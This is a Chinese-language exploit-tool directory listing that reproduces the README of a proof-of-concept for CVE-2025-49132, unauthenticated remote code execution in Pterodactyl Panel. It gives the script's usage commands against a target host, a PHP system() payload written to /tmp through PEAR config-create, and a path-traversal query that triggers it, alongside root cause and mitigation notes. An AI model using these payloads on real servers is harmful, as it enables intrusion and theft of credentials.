Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE- — PoC exploit for CVE-2025-49132 (GHSA-24wv-6c99-f843) – Unauthenticated Remote Code Execution in Pterodactyl Panel ≤ 1.11.10 | Kitploit
工具/GitHubGitHub/dollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubdollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-

CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE-

PoC exploit for CVE-2025-49132 (GHSA-24wv-6c99-f843) – Unauthenticated Remote Code Execution in Pterodactyl Panel ≤ 1.11.10

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库网站
317个月前尚未审核
分享

CVE-2025-49132

Pterodactyl Panel - 未认证远程代码执行 (RCE)


🔎 摘要

CVE‑2025‑49132 是一个影响 Pterodactyl Panel <= 1.11.10 的严重远程代码执行漏洞。

未认证的攻击者可以利用 /locales/locale.json 端点的输入验证不当来执行任意系统命令。

已在版本 1.11.11 中修复


📌 影响

成功利用可导致:

  • 未认证远程代码执行
  • 读取敏感文件(例如 .env)
  • 数据库凭据提取
  • 完全入侵服务器

严重等级:严重


🧠 根本原因

该漏洞源于以下参数的验证不当:

  • locale 参数
  • namespace 参数

攻击者可以:

  1. 滥用目录遍历 (../../../../../)
  2. 利用 config-create
  • 将任意 PHP 载荷写入 /tmp
  • 通过构造的 namespace 加载触发执行
  • 弱点分类:CWE-94 — 代码生成控制不当


    🚀 概念验证 (PoC)

    用法

    root@kitploit:~
    python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]
    

    示例

    root@kitploit:~
    python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
    python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
    

    默认路径:

    root@kitploit:~
    /usr/share/php/PEAR
    

    从 /phpinfo.php 页面获取正确路径 alt text


    🛠 利用流程

    步骤1 - 写入载荷

    攻击者使用以下命令将恶意 PHP 载荷注入 /tmp/payload.php:

    root@kitploit:~
    /<?=system('id')?>+/tmp/payload.php
    

    步骤2 --- 触发执行

    通过调用:

    root@kitploit:~
    ?locale=../../../../../tmp&namespace=payload
    

    服务器执行注入的 PHP。

    alt text

    🛡 缓解措施

    • 升级到 Pterodactyl Panel >= 1.11.11
    • 对 locale 和 namespace 输入进行清理
    • 禁用危险的 PHP 函数
    • 限制不必要的端点暴露

    📚 参考资料

    • GitHub 通告:GHSA-24wv-6c99-f843
    • CVE-2025-49132
    • Pterodactyl Panel v1.11.11 补丁提交

    下载工具